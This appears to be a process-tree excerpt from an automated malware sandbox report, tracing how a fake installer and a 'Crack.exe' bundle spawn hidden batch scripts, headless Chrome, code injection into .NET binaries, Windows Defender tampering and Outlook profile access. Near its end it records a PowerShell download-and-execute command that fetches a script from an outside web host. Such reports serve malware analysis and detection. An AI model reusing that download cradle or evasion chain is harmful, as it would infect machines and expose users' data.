    C:\Windows\system32\cmd.exe /c cock123123444.bat
    3⤵
    PID:4752
  - - C:\Users\Admin\AppData\Local\Temp\cockcreator.exe
      cockcreator.exe
      4⤵
      PID:6408
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --enable-features=NetworkServiceInProcess2 --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-dev-shm-usage --disable-features=Translate,BackForwardCache,AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --enable-blink-features=IdleDetection --export-tagged-pdf --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-sAknrK --headless --hide-scrollbars --mute-audio about:blank --disable-blink-features=AutomationControlled --remote-debugging-port=0
        5⤵
        
        PID:5888
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-sAknrK /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-sAknrK\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-sAknrK --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffda4bc9758,0x7ffda4bc9768,0x7ffda4bc9778
        6⤵
        
        PID:6300
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1388 --field-trial-handle=1540,i,15370837032554934548,16950908446892067442,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:2
        6⤵
        
        PID:8212
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=1980 --field-trial-handle=1540,i,15370837032554934548,16950908446892067442,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        6⤵
        
        PID:8916
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2480 --field-trial-handle=1540,i,15370837032554934548,16950908446892067442,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        6⤵
        
        PID:8268
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=3892 --field-trial-handle=1540,i,15370837032554934548,16950908446892067442,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:8
        6⤵
        
        PID:9920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c fds333333333333333.bat
1⤵
PID:7540
- C:\Windows\SysWOW64\timeout.exe
  timeout 60
  2⤵
  - Delays execution with timeout.exe
  PID:5492
- - C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:7516

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
nig1r21312312.exe exec hide fds333333333333333.bat
1⤵
PID:872
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c fds333333333333333.bat
  2⤵
  PID:4316
- - C:\Windows\SysWOW64\timeout.exe
    timeout 60
    3⤵
    - Delays execution with timeout.exe
    PID:820

C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
nig1r21312312.exe exec hide nig1r21312312.exe exec hide cock123123444.bat
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5548
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  nig1r21312312.exe exec hide cock123123444.bat
  2⤵
  PID:1728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c cock123123444.bat
    3⤵
    PID:7424
  - - C:\Users\Admin\AppData\Local\Temp\MisakaMikoto213213.exe
      MisakaMikoto213213.exe
      4⤵
      Suspicious use of SetThreadContext
      PID:3432
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        5⤵
        
        PID:3976
  - - C:\Users\Admin\AppData\Local\Temp\cockcreator.exe
      cockcreator.exe
      4⤵
      PID:4396
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --enable-features=NetworkServiceInProcess2 --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-dev-shm-usage --disable-features=Translate,BackForwardCache,AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --enable-blink-features=IdleDetection --export-tagged-pdf --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-Aq1j1B --headless --hide-scrollbars --mute-audio about:blank --disable-blink-features=AutomationControlled --remote-debugging-port=0
        5⤵
        Modifies Windows Defender Real-time Protection settings
        Executes dropped EXE
        
        PID:5612
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1292 --field-trial-handle=1656,i,14373660172060487930,2250122221427489410,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:2
        6⤵
        
        PID:8328
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=2080 --field-trial-handle=1656,i,14373660172060487930,2250122221427489410,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        6⤵
        
        PID:8924
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2448 --field-trial-handle=1656,i,14373660172060487930,2250122221427489410,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        6⤵
        
        PID:8988
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=3620 --field-trial-handle=1656,i,14373660172060487930,2250122221427489410,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:8
        6⤵
        
        PID:10056

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
- Modifies Windows Defender Real-time Protection settings
PID:6472

C:\Users\Admin\AppData\Local\Temp\MisakaMikoto213213.exe
MisakaMikoto213213.exe
1⤵
- Suspicious use of SetThreadContext
PID:608
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:6360

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:7456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
1⤵
PID:6700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
1⤵
PID:1744

C:\Users\Admin\AppData\Local\Temp\animecool.exe
C:\Users\Admin\AppData\Local\Temp\animecool.exe
1⤵
- Suspicious use of SetThreadContext
PID:7108

C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
1⤵
- Suspicious use of SetThreadContext
PID:184

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4312

C:\Users\Admin\AppData\Local\Temp\animecool.exe
C:\Users\Admin\AppData\Local\Temp\animecool.exe
1⤵
PID:6448

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-Aq1j1B /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-Aq1j1B\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-Aq1j1B --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0x104,0x114,0x7ffda4bc9758,0x7ffda4bc9768,0x7ffda4bc9778
1⤵
PID:1196

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
PID:9256

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:7784

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:720

C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
1⤵
- Suspicious use of SetThreadContext
PID:1728

C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\setup.exe"
1⤵
- Checks computer location settings
PID:3344
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\animecool.exe
  2⤵
  PID:4752
- - C:\Users\Admin\AppData\Local\Temp\animecool.exe
    C:\Users\Admin\AppData\Local\Temp\animecool.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:7980
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      PID:9592
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
  2⤵
  PID:2308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\govno312321412412.bat
    3⤵
    PID:6736
  - - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
      nig1r21312312.exe exec hide fds333333333333333.bat
      4⤵
      PID:9968
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c fds333333333333333.bat
        5⤵
        
        PID:9872
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout 60
        6⤵
        Delays execution with timeout.exe
        
        PID:9724
- C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
  "C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe" exec hide C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
  2⤵
  PID:8028

C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
C:\Users\Admin\AppData\Local\Temp\poxuipluspoxui.exe
1⤵
- Suspicious use of SetThreadContext
PID:4740
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
  2⤵
  PID:6828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sdfsfs3wefdsfsdfsd.bat" "
    3⤵
    PID:9860
  - - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
      nig1r21312312.exe exec hide nig1r21312312.exe exec hide cock123123444.bat
      4⤵
      PID:8104
    - - C:\Users\Admin\AppData\Local\Temp\nig1r21312312.exe
        
        nig1r21312312.exe exec hide cock123123444.bat
        5⤵
        
        PID:1672
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cock123123444.bat
        6⤵
        
        PID:9752
        
        C:\Users\Admin\AppData\Local\Temp\MisakaMikoto213213.exe
        
        MisakaMikoto213213.exe
        7⤵
        Suspicious use of SetThreadContext
        
        PID:9996
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        8⤵
        
        PID:9204
        
        C:\Users\Admin\AppData\Local\Temp\cockcreator.exe
        
        cockcreator.exe
        7⤵
        
        PID:8932
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --allow-pre-commit-input --disable-background-networking --enable-features=NetworkServiceInProcess2 --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-dev-shm-usage --disable-features=Translate,BackForwardCache,AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync --disable-hang-monitor --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-sync --force-color-profile=srgb --metrics-recording-only --no-first-run --enable-automation --password-store=basic --use-mock-keychain --enable-blink-features=IdleDetection --export-tagged-pdf --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-TGvqWy --headless --hide-scrollbars --mute-audio about:blank --disable-blink-features=AutomationControlled --remote-debugging-port=0
        8⤵
        
        PID:8880
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-TGvqWy /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-TGvqWy\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\puppeteer_dev_profile-TGvqWy --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffda4bc9758,0x7ffda4bc9768,0x7ffda4bc9778
        9⤵
        
        PID:4180
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-breakpad --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1396 --field-trial-handle=1440,i,15051192008946994332,6527147974536445536,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:2
        9⤵
        
        PID:9324
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=3 --mojo-platform-channel-handle=2044 --field-trial-handle=1440,i,15051192008946994332,6527147974536445536,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        9⤵
        
        PID:9552
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=2220 --field-trial-handle=1440,i,15051192008946994332,6527147974536445536,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        9⤵
        
        PID:4192
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=3764 --field-trial-handle=1440,i,15051192008946994332,6527147974536445536,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:8
        9⤵
        Drops file in Program Files directory
        
        PID:6244
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --disable-background-timer-throttling --disable-breakpad --enable-automation --force-color-profile=srgb --remote-debugging-port=0 --allow-pre-commit-input --disable-gpu-compositing --enable-blink-features=IdleDetection --disable-blink-features=AutomationControlled --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3436 --field-trial-handle=1440,i,15051192008946994332,6527147974536445536,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:1
        9⤵
        
        PID:5144
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --headless --mojo-platform-channel-handle=2688 --field-trial-handle=1440,i,15051192008946994332,6527147974536445536,131072 --enable-features=NetworkServiceInProcess2 --disable-features=AcceptCHFrame,AvoidUnnecessaryBeforeUnloadCheckSync,BackForwardCache,PaintHolding,Translate /prefetch:8
        9⤵
        Modifies registry class
        
        PID:4752

C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
C:\Users\Admin\AppData\Local\Temp\5975271bda\metafor.exe
1⤵
PID:8316

C:\Users\Admin\Desktop\New folder\HeInstaller\OlovWPF.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\OlovWPF.exe"
1⤵
PID:10180
- C:\Users\Public\olov.exe
  C:\Users\Public\olov.exe
  2⤵
  PID:9048

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
PID:9488
- C:\Users\Admin\AppData\Local\Temp\is-M2B4S.tmp\is-H0G9H.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-M2B4S.tmp\is-H0G9H.tmp" /SL4 $506EE "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory
  PID:6448

C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
1⤵
PID:8328

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:8988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:9508

C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe"
1⤵
PID:3744
- C:\Users\Admin\AppData\Local\Temp\is-RM9KP.tmp\is-ABQD5.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-RM9KP.tmp\is-ABQD5.tmp" /SL4 $20862 "C:\Users\Admin\Desktop\New folder\HeInstaller\file.exe" 1775056 52736
  2⤵
  - Loads dropped DLL
  - Drops file in Program Files directory
  PID:7648

C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\EBZfayui1.exe"
1⤵
PID:6512

C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe
"C:\Users\Admin\Desktop\New folder\HeInstaller\76feee748612466fbd3f219b1adae8b4 (3).exe"
1⤵
- Checks computer location settings
PID:1032
- C:\Users\Admin\AppData\Local\Temp\RarSFX3\Crack.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Crack.exe"
  2⤵
  - Checks computer location settings
  PID:9484
- - C:\Users\Admin\AppData\Local\Temp\RarSFX3\Crack.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX3\Crack.exe" -h
    3⤵
    PID:8376
- C:\Users\Admin\AppData\Local\Temp\RarSFX3\brg.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX3\brg.exe"
  2⤵
  - Accesses Microsoft Outlook profiles
  - Suspicious use of SetThreadContext
  - Checks processor information in registry
  - outlook_office_path
  - outlook_win_path
  PID:8032
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\jsc.exe"
    3⤵
    - Loads dropped DLL
    PID:1084
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WsatConfig.exe"
    3⤵
    PID:7588
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\DataSvcUtil.exe"
    3⤵
    PID:4800
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:7704
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
    3⤵
    PID:9432
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ComSvcConfig.exe"
    3⤵
    PID:5104
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe"
    3⤵
    PID:2368
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    PID:7420
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe"
    3⤵
    PID:5340
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CasPol.exe"
    3⤵
    PID:9440
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
    3⤵
    PID:8860
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"
    3⤵
    PID:7060
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe"
    3⤵
    PID:7768
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
    3⤵
    PID:7404
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe"
    3⤵
    PID:5388
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe"
    3⤵
    PID:8888
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe"
    3⤵
    PID:9160
- C:\Users\Admin\AppData\Local\Temp\RarSFX3\sqlcmd.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX3\sqlcmd.exe"
  2⤵
  - Checks computer location settings
  PID:4216
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://neutropharma.com/wp/wp-content/debug2.ps1')"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:5972
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7156
